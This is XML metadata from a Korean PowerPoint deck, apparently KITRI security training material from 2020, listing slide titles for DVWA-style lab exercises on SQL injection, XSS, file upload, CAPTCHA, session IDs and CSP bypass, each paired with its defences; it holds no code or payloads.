      <vt:lpstr>8. 대비책 – High 단계</vt:lpstr>
      <vt:lpstr>8. 대비책 – Impossible 단계</vt:lpstr>
      <vt:lpstr>8. 대비책 – Impossible 단계</vt:lpstr>
      <vt:lpstr>8. 대비책 – Impossible 단계</vt:lpstr>
      <vt:lpstr>File Upload</vt:lpstr>
      <vt:lpstr>1. 공격 개요</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Impossible)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Impossible)</vt:lpstr>
      <vt:lpstr>2. 공격진행 (Security Level : Impossible)</vt:lpstr>
      <vt:lpstr>3. 방어 대책</vt:lpstr>
      <vt:lpstr>3. 방어 대책</vt:lpstr>
      <vt:lpstr>3. 방어 대책</vt:lpstr>
      <vt:lpstr>Insecure CAPTCHA</vt:lpstr>
      <vt:lpstr>1. 공격 개요</vt:lpstr>
      <vt:lpstr>2. PC 환경 설정</vt:lpstr>
      <vt:lpstr>2. PC 환경 설정</vt:lpstr>
      <vt:lpstr>2. PC 환경 설정</vt:lpstr>
      <vt:lpstr>2. PC 환경 설정</vt:lpstr>
      <vt:lpstr>2. PC 환경 설정</vt:lpstr>
      <vt:lpstr>2. PC 환경 설정</vt:lpstr>
      <vt:lpstr>2. PC 환경 설정</vt:lpstr>
      <vt:lpstr>2. PC 환경 설정</vt:lpstr>
      <vt:lpstr>2. PC 환경 설정</vt:lpstr>
      <vt:lpstr>2. PC 환경 설정</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>3. 대비책 (Security Level : Low)</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>3. 대비책 (Security Level : Medium)</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>3. 공격진행 (Security Level : High)</vt:lpstr>
      <vt:lpstr>3. 대비책 (Security Level : High)</vt:lpstr>
      <vt:lpstr>4. Security Level : Impossible</vt:lpstr>
      <vt:lpstr>4. Security Level : Impossible</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>SQL Injection이란</vt:lpstr>
      <vt:lpstr>SQL Injection이란</vt:lpstr>
      <vt:lpstr>SQL Injection이란</vt:lpstr>
      <vt:lpstr>SQL Injection이란</vt:lpstr>
      <vt:lpstr>SQL Injection이란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High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>대응방안 Lv Impossible 참고</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>BLIND SQL INJECTION 이란?</vt:lpstr>
      <vt:lpstr>Security Level : Low</vt:lpstr>
      <vt:lpstr>SQL Map실습(low)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Medium</vt:lpstr>
      <vt:lpstr>Security Level : Medium</vt:lpstr>
      <vt:lpstr>Security Level : Medium</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>SQL Injection 대응방안</vt:lpstr>
      <vt:lpstr>SQL Injection 대응방안</vt:lpstr>
      <vt:lpstr>SQL Injection 대응방안</vt:lpstr>
      <vt:lpstr>SQL Injection 대응방안</vt:lpstr>
      <vt:lpstr>SQL Injection 대응방안</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Week Session ID란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Security Level : Low</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Security Level : Low</vt:lpstr>
      <vt:lpstr>Security Level : Low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High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : Impossible</vt:lpstr>
      <vt:lpstr>Security Level : Impossible</vt:lpstr>
      <vt:lpstr>Security Level : Impossible</vt:lpstr>
      <vt:lpstr>Security Level : Impossible</vt:lpstr>
      <vt:lpstr>Security Level : Impossible</vt:lpstr>
      <vt:lpstr>Security Level : Impossible</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>XSS (DOM)이란</vt:lpstr>
      <vt:lpstr>Security Level : Low</vt:lpstr>
      <vt:lpstr>Security Level : Low</vt:lpstr>
      <vt:lpstr>Security Level : Low</vt:lpstr>
      <vt:lpstr>Security Level : Low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Medium</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>Security Level : High</vt:lpstr>
      <vt:lpstr>XSS 취약점 예방 기술</vt:lpstr>
      <vt:lpstr>XSS 취약점 예방 기술</vt:lpstr>
      <vt:lpstr>XSS 취약점 예방 기술</vt:lpstr>
      <vt:lpstr>XSS 취약점 예방 기술</vt:lpstr>
      <vt:lpstr>XSS 취약점 예방 기술</vt:lpstr>
      <vt:lpstr>XSS 취약점 예방 기술</vt:lpstr>
      <vt:lpstr>XSS 취약점 예방 기술</vt:lpstr>
      <vt:lpstr>XSS 취약점 예방 기술</vt:lpstr>
      <vt:lpstr>XSS 취약점 예방 기술</vt:lpstr>
      <vt:lpstr>XSS 취약점 예방 기술</vt:lpstr>
      <vt:lpstr>XSS 취약점 예방 기술</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>XSS Reflected 공격 개요</vt:lpstr>
      <vt:lpstr>실습 환경 설정</vt:lpstr>
      <vt:lpstr>LOW Reflected XSS</vt:lpstr>
      <vt:lpstr>LOW Reflected XSS</vt:lpstr>
      <vt:lpstr>Low 레벨 소스코드 분석</vt:lpstr>
      <vt:lpstr>Low 레벨 공격 방법</vt:lpstr>
      <vt:lpstr>Low 레벨 공격 방법</vt:lpstr>
      <vt:lpstr>Medium Reflected XSS</vt:lpstr>
      <vt:lpstr>Medium 소스 코드 분석</vt:lpstr>
      <vt:lpstr>Medium 레벨 공격 방법</vt:lpstr>
      <vt:lpstr>High Reflected XSS</vt:lpstr>
      <vt:lpstr>High 소스 코드 분석</vt:lpstr>
      <vt:lpstr>High 레벨 공격 방법 </vt:lpstr>
      <vt:lpstr>Impossible Reflected XSS</vt:lpstr>
      <vt:lpstr>Impossible 소스 코드 분석</vt:lpstr>
      <vt:lpstr>Impossible 소스 코드 분석</vt:lpstr>
      <vt:lpstr>Impossible  레벨 공격 결과</vt:lpstr>
      <vt:lpstr>Impossible  레벨 공격 결과</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>공격 개요</vt:lpstr>
      <vt:lpstr>실습 환경 설정</vt:lpstr>
      <vt:lpstr>공격 (Low)</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>공격 (Low)</vt:lpstr>
      <vt:lpstr>공격 (Medium)</vt:lpstr>
      <vt:lpstr>공격 (Medium)</vt:lpstr>
      <vt:lpstr>공격 (Medium)</vt:lpstr>
      <vt:lpstr>공격 (Medium)</vt:lpstr>
      <vt:lpstr>공격 (High)</vt:lpstr>
      <vt:lpstr>공격 (High)</vt:lpstr>
      <vt:lpstr>공격 (High)</vt:lpstr>
      <vt:lpstr>공격 (Impossible)</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>CSP Bypass</vt:lpstr>
      <vt:lpstr>CSP 지시문 및 옵션</vt:lpstr>
      <vt:lpstr>src 옵션 설정</vt:lpstr>
      <vt:lpstr>Security 레벨 선택</vt:lpstr>
      <vt:lpstr>Low 레벨 서버 소스 코드</vt:lpstr>
      <vt:lpstr>Medium 레벨 서버 소스 코드</vt:lpstr>
      <vt:lpstr>High 레벨 서버 소스 코드</vt:lpstr>
      <vt:lpstr>high.js 코드</vt:lpstr>
      <vt:lpstr>Impossible 레벨 서버 소스 코드</vt:lpstr>
      <vt:lpstr>Impossible.js 코드</vt:lpstr>
      <vt:lpstr>Low 레벨 공격 ①</vt:lpstr>
      <vt:lpstr>Low 레벨 공격 ②</vt:lpstr>
      <vt:lpstr>Low 레벨 공격 ③</vt:lpstr>
      <vt:lpstr>Low 레벨 공격 ④</vt:lpstr>
      <vt:lpstr>Medium 레벨 공격 ①</vt:lpstr>
      <vt:lpstr>Medium 레벨 공격 ②</vt:lpstr>
      <vt:lpstr>Medium 레벨 공격 ③</vt:lpstr>
      <vt:lpstr>Medium 레벨 공격 ④</vt:lpstr>
      <vt:lpstr>High 레벨 공격 ①</vt:lpstr>
      <vt:lpstr>High 레벨 공격 ②</vt:lpstr>
      <vt:lpstr>High 레벨 공격 ③</vt:lpstr>
      <vt:lpstr>High 레벨 공격 ③</vt:lpstr>
      <vt:lpstr>High 레벨 공격 ④</vt:lpstr>
      <vt:lpstr>High 레벨 공격 ⑤</vt:lpstr>
      <vt:lpstr>Impossible 레벨 서버 소스 코드</vt:lpstr>
      <vt:lpstr>Impossible.js 코드</vt:lpstr>
      <vt:lpstr>Ⅳ. 정리  (조장 간 토의 요망)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ehee0</dc:creator>
  <cp:lastModifiedBy>KITRI</cp:lastModifiedBy>
  <cp:revision>236</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-07T11:57:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-19T12:53:35Z</dcterms:modified>
</cp:coreProperties>
</file>